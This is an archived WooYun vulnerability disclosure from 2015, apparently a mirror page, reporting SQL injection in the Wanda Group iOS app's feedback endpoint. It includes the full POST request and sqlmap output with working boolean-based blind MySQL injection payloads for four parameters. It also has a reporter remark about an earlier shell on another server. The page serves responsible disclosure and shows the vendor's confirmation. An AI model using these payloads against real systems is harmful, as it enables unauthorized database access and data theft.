乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-04: 细节已通知厂商并且等待厂商处理中 2015-01-04: 厂商已经确认,细节仅向厂商公开 2015-01-14: 细节向核心白帽子及相关领域专家公开 2015-01-24: 细节向普通白帽子公开 2015-02-03: 细节向实习白帽子公开 2015-02-18: 细节向公众公开
你爱我吗?
万达集团 ios app v2.2
POST /wanda3v/h/addfeedback.html HTTP/1.1Host: app.wanda.cnProxy-Connection: closeAccept-Encoding: gzipContent-Type: application/x-www-form-urlencoded; charset=utf-8Content-Length: 229Connection: closeCookie: Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1420337769; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1420118152,1420337420,1420337769User-Agent: ä¸è¾¾éå¢ 2.2 rv:7045 (iPhone; iPhone OS 8.1.2; zh_CN)devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136%2A640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5&email=1221%40qq.com&sysversion=8.1.2&phonemodel=iPhone%206&systype=iPhone%20OS
多个参数存在sql注入
sqlmap identified the following injection points with a total of 7629 HTTP(s) requests:---Parameter: content (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136*640&appversion=2.2&devtype=0&content=fs' RLIKE (SELECT (CASE WHEN (7172=7172) THEN 0x6673 ELSE0x28 END)) AND 'Vgrh'='Vgrh&vid=7d996adaf86b44d2913a6366808926d5&[email protected]&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OSParameter: devicetype (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0' RLIKE (SELECT (CASEWHEN (7522=7522) THEN 0 ELSE 0x28 END)) AND 'CAqA'='CAqA&resolution=1136*640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5&[email protected]&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OSParameter: vid (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136*640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5' RLIKE (SELECT (CASE WHEN (4488=4488) THEN 0x3764393936616461663836623434643239313361363336363830383932366435 ELSE 0x28 END)) AND 'UkkU'='UkkU&[email protected]&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OSParameter: email (POST) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136*640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5&[email protected]' RLIKE (SELECT (CASE WHEN (8648=8648) THEN 0x313232314071712e636f6d ELSE 0x28 END)) AND 'MtMZ'='MtMZ&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OS---[10:34:09] [WARNING] changes made by tampering scripts are not included in shown payload content(s)there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: devicetype, type: Single quoted string (default)[1] place: POST, parameter: content, type: Single quoted string[2] place: POST, parameter: vid, type: Single quoted string[3] place: POST, parameter: email, type: Single quoted string[q] Quit>[10:34:26] [INFO] testing MySQL[10:34:26] [INFO] confirming MySQL[10:34:26] [INFO] the back-end DBMS is MySQLweb application technology: Nginxback-end DBMS: MySQL >= 5.0.0
目测和前面getshell 的服务器不是同一台内网服务器,有搞头
下线更新吧!
危害等级:高
漏洞Rank:12
确认时间:2015-01-04 10:53
感谢zzR同学的关注与贡献!马上通知业务整改!
暂无